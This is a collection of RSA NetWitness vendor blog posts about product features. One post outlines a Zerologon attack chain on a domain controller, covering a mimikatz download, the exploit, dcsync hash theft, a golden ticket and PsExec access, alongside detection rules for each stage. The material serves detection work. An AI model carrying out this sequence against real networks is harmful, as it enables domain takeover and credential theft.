Skip navigation
All Places > Products > RSA NetWitness Platform > Blog
1 2 3 Previous Next

RSA NetWitness Platform

614 posts

RSA NetWitness Platform 11.5 has expanded support for Snort rules (also known as signatures) that can be imported into the network Decoders. Some of the newly supported rule parameters are:

  • nocase
  • byte-extract
  • byte-jump
  • threshold
  • depth
  • offset

This additional coverage enables administrators to use more commonly available detection rules that were not previously supported. The ability to use further Snort rules arms administrators with another mechanism, in addition to application rules and Lua parsers, to extend the detection of known threats. 

 

To expand your knowledge on what is and is not supported, along with a much more detailed initial setup guide, check out Decoder Snort Detection 

 

Once configured, to Investigate the threats that Snort rules have triggered, examine the Events pivoting in the metadata (sig.id, sig.name) populated from the rules themselves or query for threat.source = "snort rule" to find all Snort events. The Signature Identifier (sig.id) corresponds to the sid attribute in the Snort rule while the Signature Name (sig.name) corresponds to the msg attribute of the rule options.

Snort rules found

As always, we welcome your feedback!

 

Please leave any feedback or suggestion on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit you own.

Zerologon (CVE-2020-1472) is a vulnerability with a perfect CVSS score of 10/10 being used in the wild by attackers, allowing them to gain admin access to a Windows Domain Controller.

 As more public exploits for this vulnerability are being published, including its support within mimikatz which is widely used, it’s expected to see even more attacks leveraging this vulnerability, and it's therefore crucial to be able to detect such attempts.

 

In this post we will see how this vulnerability can be exploited using mimikatz to gain administrative access to a Windows Domain Controller running on Windows Server 2019, and how the different stages of the attack can be identified by the RSA NetWitness Platform, leveraging Logs, Network and Endpoint data. This will include exploiting the Zerologon vulnerability, followed by the creation of golden tickets, and finally gaining admin access to the domain controller via a pass-the-hash attack/

  

We will assume that the attacker already has an initial foothold on one of the internal workstations, and now wants to move laterally to the domain controller.

 

 

Step 1

Attacker

The attacker downloads “mimikatz” on the compromised system using the “bitsadmin” command.

 

 

RSA NetWitness Endpoint

The executed command is detected by RSA NetWitness Endpoint and tagged as remote file copy using BITS. The exact target parameters are also provided, allowing to see from where the file was downloaded (identifying the attacker’s server) as well as the location of the downloaded file. In addition, mimikatz being a known malicious file, we are able to tag the event accordingly.

 

 

 

RSA NetWitness Network

And the resulted network session is captured by RSA NetWitness Network, identifying the client application as Microsoft BITS as well as the downloaded file (mimikatz.exe). If needed, the session can be reconstructed to extract the file for further forensics.

 

 

 

 

 

Step 2

Attacker

The attacker launches mimikatz, and tests whether the domain controller is vulnerable to the Zerologon vulnerability.

 

As the domain controller is vulnerable, the attacker executes the exploit.

 

 

RSA NetWitness Network

We know that the exploit starts with a “NetrServerReqChallenge” and spoofs the “NetrServerAuthenticate” with 8x ‘0’s (as seen in the previous screenshot). We also know that it takes an average of 256 of such attempts for the attack to be successful.

This consequently leads to the following:

  • We expect to see “NetrServerReqChallenge” and “NetrServerAuthenticate”
  • Due to the large number of attempts, we expect the size of the session to be larger than other similar connections
  • The session to contain lots of 0's

 

 In fact, by looking at the captured network session, we can see these indicators tagged by RSA NetWitness.

 

As seen in the above screenshot

  • The session is related to netlogon (as the vulnerability targets this service)
  • We can see both “NetrServerReqChallenge” and “NetrServrAuthenticate” within the session
  • The most common byte (MCB.REQ) is “0”
  • The size of the payload is around 200KB
  • As we also have the RSA NetWitness Endpoint agent installed on the workstation, we can link the captured network session to the process that generated this connection, in this case “mimikatz.exe”

 

Using this information, the use of this exploit could be identified with the follow Application Rule:

service=135 && filename='netlogon' && action begins 'NetrServerAuthenticate' && action='NetrServerReqChallenge' && mcb.req=0 && size>40000

 

 

RSA NetWitness Logs

A successful attack would lead to the domain controller’s password being changed. This can be identified within the Windows Logs based on the following criteria:

  • Event ID: 4742 (A computer account was changed)
  • Source User: Anonymous logon
  • Destination User: ends with “$” sign
  • Hostname: specify your domain controllers

 

 

 

The following Application Rule / Query could be used for this detection:

device.type='windows' && reference.id='4742' && user.dst ends '$' && user.src='anonymous logon'

 

 

 

 

 

Step 3

Attacker

Once the attacker successfully exploits the domain controller, he now has access to it with replication rights. He can now use the “dcsync” feature of mimikatz to mimic the behavior of a domain controller and request the replication of specific users to get their password hashes. This can be done to get the password hash of the Administrator account as seen in the below screenshot.

 

 

 

RSA NetWitness Network

User Replication is requested using the “GetNCChanges” function, which would result in the domain controller providing the account hashes. This behavior can be seen based on the captured network traffic.

 

 

This behavior should me monitored and alerted on when initiated from an IP or subnet not expected to perform domain replication.

 

The following is a rule that can identify this behavior, it should be fine-tuned to exclude IP addresses that are expected to have this behavior:

 

action = ‘drsgetncchanges’ && ip.src != <include list of approved IP addresses>

 

 

RSA NetWitness Logs

This would also generate Windows Logs with the event ID 4662, but by default this log doesn’t provide enough granularity to avoid having too many false positives and is therefore not recommended to be used on its own as a detection mechanism.

 

 

 

 

 

Step 4

Attacker

The attacker then gets a golden ticket with a validity of 10 years for the Administrator account.

 

He is then able to use the ticket in a pass-the-hash attack.

 

He is now able to get shell access to the domain controller without the need for authentication and executes couple of commands to confirm he is connected to the Domain Controller (hostname, whoami ...).

 

 

 

RSA NetWitness Logs

The attacker gained shell access by using PsExec. This leads to the creation of a service named “psexesvc” on the domain controller that can be detected with Windows Logs and is tagged as a pass-the-hash attack by RSA NetWitness as seen below.

 

 

RSA NetWitness Network

Leveraging network data can uncover more details.

As seen in the below screenshot, we can identify:

  • The use of the “Administrator” account to login over SMB
  • The use of Windows admin shares
  • The transfer of an executable within one of the sessions (psexe)
  • The creation of a service (psexesvc)

 

 

 

RSA NetWitness Endpoint

The initial execution of “cmd.exe” by PsExec on the Domain Controller to gain the shell access can easily be identified by RSA NetWitness Endpoint.

 

Any other command executed by the attacker after he gets shell access would also be identified and logged by RSA NetWitness Endpoint, with the ability to track which commands have been executed, and by which processes they have been launched, providing a full picture of how and what the attacker is doing on the domain controller.

 

 

 

Conclusion

When dealing with such attacks and breaches, which often blend in within normal noise and behaviors, it becomes evident that the need for a rich data set based on a combination of Logs, Network and Endpoint is critical to both detect the breach as well as to identify the full scope of the breach from start to end, for each step done by the attacker.

Having visibility over East/West network traffic with rich metadata has also brought lots of value when compared to just relying on logs to detect and investigate more efficiently this attack. With the release of the RSA NetWitness Platform v11.5 it is now possible to setup policies to define for which network traffic to keep/drop the full payload in addition to the meta data, allowing to do east/west network capture in a more efficient way.

RSA NetWitness has been supporting Structured Threat Information eXpression (STIX™) as it has been the industry standard for Open Source Cyber Threat Intelligence for quite some time. 

 

 

In NetWitness v11.5 we take the power of Threat Intelligence coming from STIX to the next level. When in Investigate or Respond views, you will now see context of the Intel delivered by STIX right there next to the meta like this:

 

For this - NetWitness Platform’s has enhanced the existing integration with STIX to improve the threat detection capabilities with improved Threat Intel information to detect and respond to attacks in a timely manner. Now, when an analyst investigates threat intelligence information retrieved from a STIX data source, the context for each indicator is displayed. The context information includes viewing the adversary and the attack details directly from Context Hub, in both Investigate and Respond views.

 

Note that for the analyst to use this capability, an administrator needs to configure the STIX data sources to retrieve the threat intelligence data from the specified STIX source as below.

 

 

  1. Add & Configure STIX/TAXII as a 'Data Source' (note that you can add TAXII server/REST server/STIX file): 
  2. Create Feeds: Setup STIX feed from Custom Feeds section. Note that you can now see all the existing STIX Data Sources (as added in pervious step) to create feeds out of them. See Decoder: Create a STIX Custom Feed  for more details.
  3. Context Lookup Summary
  4. Context Lookup Details:

Here are the links to detailed documentation around STIX: 

 

Check it out and let us know what you think!

 

We strongly believe in the power of feedback! And thus please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

As of RSA NetWitness 11.5, configuring what network traffic your Decoders collect and to what degree it should collect it has become much easier. Administrators can now define a collection policy containing rules for many network protocols and choose whether to collect only metadata, collect all data (metadata and packets), or drop all data.

 

NW 11.5 Selective Collection Policy Creation

 

This is made simpler by out-of-the-box (OOTB) policies that cover most typical situations. These can also be cloned and turned into a custom policy that fits your environment best. 

 

NW 11.5 Initial Selective Collection Policies

 

The policies are managed out of a new central location that has the ability to publish these policies to multiple network Decoders at once. This allows an administrator to configure one collection policy for DMZ traffic and distribute that to all the DMZ Decoders while simultaneously using a separate policy for egress traffic and distribute that to all the egress Decoders.

 

NW 11.5 Selective Collection Policy Status

 

An administrator can view which policies are published, the Decoders they have been applied to, when the last update was made and by whom. The policies can also be created in draft form (unpublished) and not distributed to Decoders until a maintenance window is available.

 

Initially this capability focuses on network collection, but long-term plan is to continue adding types of configurations and content to be administered using this centralized management approach. Please reference the RSA NetWitness Platform 11.5 documentation for further details at Decoder: (Optional) Configure Selective Network Data Collection 

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

RSA NetWitness 11.5 introduces the ability to interactively filter events using the metadata associated with all the events. This is seen as a new Filter button inside the Event screen that opens the Filter Events panel.

 

NW 11.5 Event Filter Button

 

This new capability functions in two modes.

 

NW 11.5 Event Filter Panel

 

The first presents a familiar search experience for analysts of all skill levels as many websites have a similar layout where filters (attributes or categories of the data) exist on the left side of the page and the matching results display on the right side. As an example in the below image, clicking the metadata (#1) in this integrated panel automatically builds the query (#2) and retrieves the resulting table (#3) of matching events.

 

NW 11.5 Event Filter Interactive Workflow

 

As analysts use this, it helps build the relationship between the metadata associated with the events and how to use those to structure a query.

 

NW 11.5 Full Screen Filter Events Panel

 

The second mode allows the panel to extend full screen giving more real-estate to show more metadata at once. This mode may seem very familiar to those who have used Navigate previously. As meta data values are clicked they are added as filters to the query bar and updates a new filter list based on the events filtered out. What it does not do is execute the query to retrieve the resulting table of events. This allows the analyst to hunt through the data and then when ready to see the results they can minimize (highlighted in above image) the Filter Events panel to reveal the results.

 

In both modes, the meta values associated to the meta keys can be organized by event count or event size and sorted by the count or value. This allows for analysts to sort descending by event count to find outliers, a small limited number of communications, for example. The meta keys can also be shown in smaller meta groups to help analysts focus in on the most specific values for certain use cases. Analysts can use the query profiles to execute a query with a predefined query, meta group, and column group allowing them to jump right into a specific subset of data. The right click actions that provide additional query and lookup options are also available. To get a further deep dive into the capability check out the Investigate documentation Investigate: Drill into Metadata in the Events View (Beta)  

 

As always, we welcome your feedback!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

A business what?  A Business Context Feed is a feed that provides context about systems or data that is present in NetWitness to aid the analyst in understanding more about the system or data they are examining.  The Business Context Feed should answer some basic questions that always come up during the analysis.

What is this system? - Web Server, Domain Controller, Proxy Server, etc...

What does it do? - Authentication, Database/Application Server, Customer Portal, etc...

Would it be considered a Critical Asset?

A classic scenario would be for an IP address.  If an analyst would like to know if the IP address of interest is a Domain Controller, they would need to obtain or identify all of the IP addresses of the Domain Controllers.  Then a query must be constructed to determine if there is a match (ip.all= 10.1.22.36,10.1.22.37.14,10.16.4.3,10.8.48.89,... you get the idea).  If there is any content such as reports or alerts that are developed for this use case the list of IP addresses would need to be in all of those as well.  It can get complicated real quick once you start putting this list of IP's in content, especially when the addresses change periodically.  Creating a Business Context Feed will simplify this use case by maintaining a single feed that is centrally managed. Updating the feed can even be automated in most cases.  When the feed is applied to this use case the query gets simplified from (ip.all= 10.1.22.36,10.1.22.37.14,10.16.4.3,10.8.48.89,... you get the idea) to a query using a custom metakey hnl.asset.role='domain controller'.  Now, it is not uncommon for an organization to create around a dozen custom metakeys in NetWitness for their own use to provide additional context for data that is collected in NetWitness.  But not everyone takes the time to create a taxonomy document to set the standard on how the custom content will be defined and populated to provide consistency for other content that will be developed around it.  Frankly, it is not advised to comingle custom meta values with the meta values that are created by NetWitness natively.  This can create confusion on what the values "are" versus what they "should be", and can adversely affect other content that uses these standard keys. There are reserved metakeys that custom values do not belong, these can be identified in the Unified Data Model (UDM) as "Reserved" in the "Meta Class" column or in the "Notes" column (use "ctrl+f" in the browser).  When creating custom content it is important to set standards on how the content is created, this includes naming conventions, spelling, formatting and values. This practice provides the necessary consistency for stable content development and performance.  Another common issue is the custom content becomes knowledge exclusive to the author and can affect the time it takes to bring new people up to speed. Another factor is time, as the undocumented knowledge becomes stale to the author and often cannot recall the logic behind the naming, purpose, or value. The taxonomy document takes the burden off of the content author and provides a reference for all parties involved in creating, updating and consuming the content.  Below is an example use case of the taxonomy to create custom metakeys and content to identify critical assets.

 

Creating Custom Metakeys - Things to Know

Name Length

You are limited to 16 characters (including the "." dot delimiter)  - use lowercase only for the name and values.

 

Allowed Characters

Only alpha numeric values are allowed, except for the "." delimiter.

 

Name Construction

Metakey names should follow the Unified Data Model (UDM) "3 Logical Parts" and should not conflict with any current RSA keys.


Metakey concept image

Value Format

You must decide what your metakey value it will store and define it in the appropriate custom index files if needed. The most commonly used formats are "Text" and "Integer". There are other formats but these are the most commonly used.

 

Multivalued Field

You will have to properly identify whether or not your metakey may contain multiple values in the same session.  This is done in the index file with a singleton="true" in the concentrator custom index files.  The reason for this is to have the ESA properly identify the field as a multivalued field (array) or a single valued field automatically.  

 

Example Use Case:  Creating Critical Asset Metakeys

Concept

The concept is the least specific part of the metakey name, typically used to group the metakeys, or in this case clearly identify the custom metakeys from the standard metakeys.  The concept for these asset metakeys will be an abbreviation of my "Homenet Lab", it is not uncommon to use an abbreviated company name here.  I will use "hnl" in this case.

 

Context

The context is more specific and will typically define the "classification" of the key.  A context name of "asset" will be used here as these keys are for identifying the critical assets

 

Sub-Context 

The sub-context is the most specific, the specific sub-context values are shown below:

Description

Sub Context Abbreviation
Criticalitycrit
Categorycat
Rolerole
Hostnamehost
Datedate
Locationloc

 

General Description of the Metakeys

The table below contains the metakey names fully assembled with the "concept.context.sub-context" values applied, showing a general description of the custom metakeys.

Metakey NameDescription
hnl.asset.critNumeric "Criticality" rating of the asset.
hnl.asset.cat"Category" of the asset
hnl.asset.role"Role" of the asset
hnl.asset.host"Hostname" of the asset
hnl.asset.date"Date" the asset was added to the feed
hnl.asset.loc"Location" of the asset

 

Metakey Value Format

Define whether this metakey value will be text or an integer.

MetakeyValue FormatStore Multiple Values
hnl.asset.critUInt8No
hnl.asset.catTextYes
hnl.asset.role

Text

Yes

hnl.asset.hostText

No

hnl.asset.dateUInt32No
hnl.asset.locTextNo

 

Metakey Values

hnl.asset.crit

This metakey identifies the criticality of the system.  The table below lists the possible values and describes the values to use in the metakey.

Metakey Value

Description

1Extremely Critical
2Highly Critical
3

Moderately Critical

4Low


hnl.asset.cat

This metakey identifies the category of the system.  The table below lists the possible values and describes the values to use in this metakey.  Note the values are always lowercase.

Metakey Value

Description

authenticationSystems that provide authentication services, like domain controllers, LDAP servers, RADIUS, SecurID, TACACS, etc.
firewallSystems that provide firewall services.
scanner

Systems that perform scanning activities like a port/vulnerability scanner or pen test

networkNetwork Infrastructure

 

hnl.asset.role

This metakey identifies the role of the system.  The table below lists the possible values grouped by category along with the descriptions of the values to use in this metakey.  Note the values are always lowercase.

Category

Description

Value

authenticationMicrosoft Active Directorydomain controller
authenticationRADIUS Serverradius server
authenticationSecurID Serversecurid server
firewallFirewall operating in the ecommerce DMZecommerce dmz
firewallInternal firewall for secure hostingsecure hosting
firewallInternet Perimeter Firewallinternet perimeter
scannerVulnerability Scannervulnerability
scannerPenetration testingpentest
networkCore network router

core router

networkCore network switchcore switch

 

hnl.asset.host

This metakey has the short hostname in lowercase

 

hnl.asset.date

This metakey contains the numeric date the system was added to the feed in YYYYMMDD format.  The date is used to determine the age of the entry and to also know that prior to this date there is no contextual meta generated.

 

hnl.asset.loc

This metakey identifies the location of the system. The table below lists the possible values and describes the values to use in this metakey. Note the values are always lowercase.

Metakey Value

Description

hqdc-01Headquarters Data Center 1
lvdc-02Leonardville Data Center 2
mscwdc-03

Moscow Data Center 3

raddc-04Radium Data Center 4

 

Sample Business Context Feed Using Taxonomy

User Friendly Version:

#indexhnl.asset.crithnl.asset.cathnl.asset.rolehnl.asset.hosthnl.asset.datehnl.asset.loc
10.0.0.11firewallperimeterhnlhqfw-0120200708hqdc-01
192.168.1.11firewallsecure hostinghnlshfw-0220200708hqdc-01
192.168.63.1001authenticationdomain controllerhnraddc-0120200708raddc-04
192.168.1.871authenticationdomain controllerhnlvdc-0220200708lvdc-02
192.168.50.1001authenticationdomain controllerhnmscwdc-0320200708mscwdc-03
10.0.0.161networkcore switchhnlcsw-0120200708hqdc-01

 

CSV File format for Feed Consumption:

#index,hnl.asset.crit,hnl.asset.cat,hnl.asset.role,hnl.asset.host,hnl.asset.date,hnl.asset.loc
10.0.0.1,1,firewall,perimeter,hnlhqfw-01,20200708,hqdc-01
192.168.1.1,1,firewall,secure hosting,hnlshfw-02,20200708,hqdc-01
192.168.63.100,1,authentication,domain controller,hnraddc-01,20200708,raddc-04
192.168.1.87,1,authentication,domain controller,hnlvdc-02,20200708,lvdc-02
192.168.50.100,1,authentication,domain controller,hnmscwdc-03,20200708,mscwdc-03
10.0.0.16,1,network,core switch,hnlcsw-01,20200708,hqdc-01

 

Customizing Index

Now that the metakey names and values have been established they can be added to the necessary index custom files so that they are available to the analyst in Investigate.

 

Log/Network Decoders

There are two metakeys that are defined as integers, so we need to tell the Log or Network Decoder that these metakeys are to be formatted as integers.

The following custom index files need to be modified with the entries below:

index-logdecoder-custom.xml (Log Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" format="UInt32" level="IndexNone"/>

index-decoder-custom.xml (Network Decoder)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet Lab Custom metakeys *** -->
<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexNone"/>
<key description="HNL Asset Date" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexNone"/>

Concentrators

All of the custom meta keys will need to be added to the Concentrator to be available in Investigate for the Analysts.

The following custom index file need to be modified with the entries below.

index-concentrator-custom.xml (Concentrator)

<!-- *** Homenet Lab Custom Index 1.0 05/04/2020 *** -->
<!-- *** Homenet custom index keys added to provide additional information from feeds *** -->

<key description="HNL Asset Criticality" name="hnl.asset.crit" singleton="true" format="UInt8" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Category" name="hnl.asset.cat" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Role" name="hnl.asset.role" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Hostname" name="hnl.asset.host" singleton="true" format="Text" level="IndexValues" valueMax="50"/>
<key description="HNL Asset Date Added" name="hnl.asset.date" singleton="true" format="UInt32" level="IndexValues" valueMax="100"/>
<key description="HNL Asset Location" name="hnl.asset.loc" singleton="true" format="Text" level="IndexValues" valueMax="50"/>

 

Now you have more information than just an IP address to look at thanks to the Taxonomy and a Business Context Feed.

 

As of RSA Netwitness Platform 11.5, analysts have a new landing page option to help them determine where to start upon login.  We call this new landing page Springboard.  In 11.5 it will become the new default starting page upon login (adjustable) and can be accessed from any screen simply by click the RSA logo on the top left. 

 

The Springboard is a specialized dashboard (independent of the existing "Dashboard" functionality) designed as a starting place where analysts can quickly see the variety of risks, threats, and most important events in their environment.  From the Springboard, analysts can drill into any of the leads presented in each panel and be taken directly to the appropriate product screen with the relevant filter pre-applied, saving time and streamlining the analysis process.  

 

As part of the 11.5 release, Springboard comes with five pre-configured (adjustable) panels that will be populated with the "Top 25" results in each category, depending on the components and data available:

 

Top Incidents - Sorted by descending priority.  Requires the use of the Respond module.

Top Alerts -  Sorted by descending severity, whether or not they are part of an Incident. Requires the use of the Respond module.

Top Risky Hosts -  Sorted by descending risk score.  Requires RSA NetWitness Endpoint.

Top Risky Users - Sorted by descending risk score.  Requires RSA UEBA.
Top Risky Files - Sorted by descending risk score. Requires RSA NetWitness Endpoint.

 

Springboard administrators can also create custom panels, up to a total of ten, of a 6th type for aggregating "Events" based on any existing saved query profile used in the Investigate module.  This only requires the core RSA NetWitness platform, with data being sourced from the underlying NetWitness Database (NWDB).  This enables organizations to add their own starting places for analysts that go beyond the defaults, and to customize the landing experience to adjust for deployed RSA NetWitness Platform components:

 

Example of custom Springboard Panel creation using Event data

 

For more details on management of the Springboard, please see: NW: Managing the Springboard 

 

And as always, if you have any feedback or ideas on how we can improve Springboard or anything else in the product, please submit your ideas via the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform  

RSA is pleased to announce the availability of the NetWitness Export Connector, which enables customers to export NetWitness Platform events and routes the data where you want, all in continuous, streaming fashion. Providing the flexibility to satisfy a variety of use cases. 

 

This plugin is installed on Logstash and integrates with NetWitness Platform Decoders and Log Decoders. This plugin aggregates meta data and raw logs from the Decoder or Log Decoder and converts it to Logstash JSON object, which can easily integrate with numerous consumers such as Kafka, AWS S3, TCP, Elastic and others.

 

Work Flow of NetWitness Export Connector 

 

  • The input plugin collects meta data and raw logs from the Log Decoder, and the meta data from the Decoder. The data is then forwarded to the Filter plugin.
  • The Filter plugin adds, removes, or modifies the received data and forwards it to the Output plugin.
  • The Output plugin sends the processed event data to the consumer destinations. You can use the standard Logstash output plugins to forward the data.

 

Check it out and let me know what you think!

 

Please leave any feedback or suggestions on how to make this experience even better. To see what else may be in store for future releases, go to the RSA Ideas portal for the RSA NetWitness Platform to see enhancements that have been suggested, vote on them, and submit your own. 

 

Download and Documentation

https://community.rsa.com/docs/DOC-114086

We are excited to announce the release of the new RSA OSINT Indicator feed, powered by ThreatConnect!  

 

What is it?

There are two new feeds that have been introduced to RSA Live, built on Open Source Intelligence (OSINT) that has been curated and scored by our partners at ThreatConnect:

  • RSA OSINT IP Threat Intel Feed, including Tor Exit Nodes
  • RSA OSINT Non-IP Threat Intel Feed, which includes indicators of types:
    • Email Address
    • URLs
    • Hostnames
    • File Hashes


These feeds are automatically aggregated, de-duplicated, aged and scored with ThreatConnect's ThreatAssess score. ThreatAssess is a metric combining both the severity and confidence of an indicator, giving analysts a simple indication of the potential impact when a matching indicator is observed.  Higher ThreatAssess scores mean higher potential impact.  The range is 0-1000, with RSA opting to focus on the highest fidelity indicators with scores 500 or greater (as of the 11.5 release - subject to change as needed)

 

Who gets it?

These feeds are included for any customer, with any combination of RSA NetWitness Logs, RSA NetWitness Packets, or RSA NetWitness Endpoint under active maintenance at no charge. The feed will work on any version of RSA NetWitness, but please see the How do I deploy it? section for notes on version-specific considerations.

 

How do I deploy it?

These feeds will show up in RSA Live as follows:

 

To deploy and/or subscribe to the feed, please take a look at the detailed instructions here: Live: Manage Live Resources 

 

11.4 and earlier customers will want to add a new ioc.score meta key to their Concentrator(s) in order to be able to query and take advantage of the ThreatAssess score of any matched indicator. Please see 000026912 - How to add custom meta keys in RSA NetWitness Platform  for details on how to do this. Please note that this meta key should be of type Uint16 - inside the index file, the definition should look similar to this:

 

11.5 and greater customers do not need to add this key, as it's already included by default.

 

 

How do I use it?

Once the feeds are deployed, any events or sessions with matching indicators will be enriched with two additional meta values, ioc and ioc.score.  These values are available for use in all search, investigation, and reporting use cases assuming those keys have been enabled.

 

 

eg. Events filter view

eg. Event reconstruction view

 

What happens to the "RSA FirstWatch" and Tor Exit Node feeds?

If you are running these new feeds, you do not need to run the existing RSA FirstWatch & Tor Exit Node feeds in parallel as they are highly redundant and tend to be less informative when matches occur.  At some point in the near future once we believe impact will be minimal, we will officially deprecate the RSA FirstWatch & Standalone Tor Exit Node feeds.

 

Do you have ideas?

If you have ideas on how to make these feeds better, ideas for content creation leveraging these feeds, or anything else in the RSA NetWitness portfolio, please submit and vote on ideas in the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 

Before I jump into explaining what is the relation between RSA NetWitness as an evolved SIEM and Threat Defense platform and Gartner’s SOC Visibility triad, I’m going to start by talking about Gartner for a minute. I expect everyone knows who Gartner are. They are a worldwide IT leading research and advisory organization and one of the most trusted and reputable ones in addition to being active within the Cyber Security field for SOC Threat Detection and Response tools such as: SIEM, NTA, EDR, UEBA, SOAR..etc. The reason we are mentioning Gartner today is that they did a piece of great work last year that sought to simplify complex views of modern security toolset requirements into a single picture of what good looks like.

 

They called it the SOC visibility triad and it calls out the three pillars of security, being your traditional log-centric SIEM, network-orientated and endpoint security detection and response tools.

Combining all these 3 technologies together helps in filling gaps among them to provide full security visibility. That combined approach significantly reduces the chances of an (internal or external) bad actor  to evade your deployed systems for a prolonged period of time which ultimately enables you to effectively meet the required SOC Metrics in terms of MTTD/MTTR and cut down the dwell time of a bad actor. 

 

The reason we like it is that Gartner, arguably the most respected of today’s analysts, has essentially drawn the core of RSA NetWitness.

 

RSA NetWitness brings together the breadth of coverage of log management solutions with the detailed, intelligence and forensic  worlds of endpoint and network into a single, modular and powerful  security platform.                                                                

  

Cyber security has always been a battleground so there has always been evolution of the tools used to attack and the tools used to defend. More recently we’ve seen huge rises in the use of automation by attackers, massive ransomware campaigns, huge data breaches and some pretty big fines being handed out through regulation like GDPR. Of course, most recently, the Covid-19 pandemic has seen huge numbers of businesses suddenly alter the way of doing business and consequently their security posture by rapidly allowing remote access to their corporate resources from anywhere.

 

All these cyber security pressures combined with most businesses thirst for technology adoption and digitization created huge change. At the heart of the change are security teams trying to build or maintain adequate protections, trying to be business enablers and not blockers.

 

To succeed, security teams need to move from the conventional approach of multi-layered, disjointed security tooling that uses old detection methods like rules and signatures to something more valuable. Modern security tooling needs to be able to consume all data sources, not just logs, and use the latest analysis techniques like machine learning to find important security insights and reduce the alert noise created by traditional approaches. Full visibility is important and by that we don’t just mean having visibility across the whole estate. We also mean combining intelligence from those data sources to undercover threats the individual tools wouldn’t notice.

 

As you’d expect, Gartner name us as a leader in their MQ reporting for this very reason.

 

 

Using a mixed approach in detection using a large library of out-of-the-box rule-sets combined with the latest in machine learning, RSA NetWitness as a modular and a platform-anywhere solution can automatically classify alerts based on their risk score across all data sources fully aligned with MITRE ATT&CK framework and Gartner agreed that as a single platform RSA NetWitness shines.

 

 For the traditional log centric SIEM space, we have a comprehensive integration coverage (see this URL RSA NetWitness Platform Integrations Catalog ) , intuitive/interactive UI (https://community.rsa.com/docs/DOC-110149#Incident_Response ),

toolset with advanced query and advanced correlation capabilities. Where we can consume log data from  350+ log sources and get all this data filtered, normalized and enriched at capture time. Then applying real-time correlation-based analytics and reporting to provide real time alerts and dashboards visibility into any spotted threat.  NetWitness also extends this with a fully unsupervised, multi-model, machine learning UEBA (User and Entity Behavioral Analytics) engine. This engine forms a picture of normal user and entity (endpoint, network) activity and finds anomalies automatically, for example, a malicious insider, credentials theft, brute-force, process injections ..etc (further details on UEBA use cases and indicators can be found here UEBA: NetWitness UEBA Indicators)

 

The network detection space is really where RSA NetWitness was born and is unbeaten. RSA NetWitness can perform a continuous full-packet capture while providing a real time OSI stack "layer 2" to "layer 7" network threat detection. Like with log data this data is normalized and enriched alongside all other data sources. Specifically, with packet data we can reconstruct entire network sessions and extract malicious payloads, digital artefacts and the likes for further analysis.

 

At the endpoint, RSA NetWitness provides further security intelligence data by tracking system and user space processes and further enhancing the UEBA engine. With our lightweight agent we can directly perform remediation measures on endpoints from simple process shutdowns or protocol blocks to full endpoint isolation to stop compromise at the source (How to Isolate a Host from the Network ). Also, as with network detection, we can pull interesting assets such as malicious programs, MFT, system/process dump files from the endpoint for deeper analysis.

 

All of this analysed security data gathered and generated can be enriched with our threat intelligence engine which provides yet more insight, confidence, risk scoring into known threats like compromised IP addresses, malicious code or actors. This all provides huge amounts of insight for use in threat remediation or incident response activities. These threat responses can be tracked or automated through the main analyst interface (Respond: Responding to Incidents ) , or, through our security orchestration and automation (SOAR) engine called NetWitness Orchestrator (Security Automation and Orchestration ) .

 

We describe RSA NetWitness as a reliable evolved SIEM and threat defense SOC platform because of this ability to produce high-fidelity alerts across all data sources, lower false positives through the depth of its insight and detect threats faster. It can also act as your storyteller, allowing you to go back in time and pick through an attack blow by blow. It goes beyond a single indicator-of-compromise type detection to a malicious log/network/endpoint/user based behavior and TTP (tactics, Techniques and Procedures) detection,  to getting you a step ahead of the threat and ultimately improve your overall digital immunity across your estate in the face of known and unknown threats on a proactive manner. 

 

Importantly, it gives you the best possible information to answer the burning questions during any attack:

When and how did it happen?

What systems were affected?

What’s the magnitude and impact of it?

 

Special Thanks to Russel Ridgley RSA's UKI CTO, who contributed and helped me in writing this article. Please feel free to leave a comment if you have any question or interest to understand more on the RSA NetWitness solution. Thank you!. 

By default, NetWitness Endpoint 11.x creates a self-signed Certificate Authority during its initial installation, and uses this CA to generate certificates for the endpoint agent and the local reverse proxy that handles all incoming agent communications. Because all these certificates are generated from the same CA chain, they automatically trust each other and enable seamless, easy, and secure communications between agents and the endpoint server.

 

But what if this self-signed CA cannot be used within your organization? For a number of very valid reasons, many orgs might not allow software using a self-signed certificate, and may instead be required to use their own trusted CAs. If this is the case, we have a couple options - an easy way, and a hard way.

 

This blog covers the hard way.

 

Everything that we do in the hard way must occur after the Endpoint Log Hybrid host has been fully installed and provisioned. This means you'll need to complete the entire host installation before moving on to this process.

 

There are 2 primary requirements for the hard way:

  • you must be able to create a server certificate and private key capable Server Authentication
  • you must be able to create a client certificate and private key capable of Client Authentication
    • this client certificate must have Common Name (CN) value of rsa-nw-endpoint-agent

 

I won't be going into details on how to generate these certificates and keys - your org should have some kind of process in place for this. And since the certificates and keys generated from that process can output in a number of different formats, I won't be going into details on how to convert or reformat them. There are numerous guides, documents, and instructions online to help with that.

 

Once we have our server and client certificates and keys, make sure to also grab the CA chain used to generate them (at the very least, both certs need to have a common Root or Intermediate CA to be part of the same trusted chain). This should hopefully be available through the same process used to create the certs and keys. If not, we can also export CA chains from websites - if you do this, make sure it is the same chain used to create your certificates and keys.

 

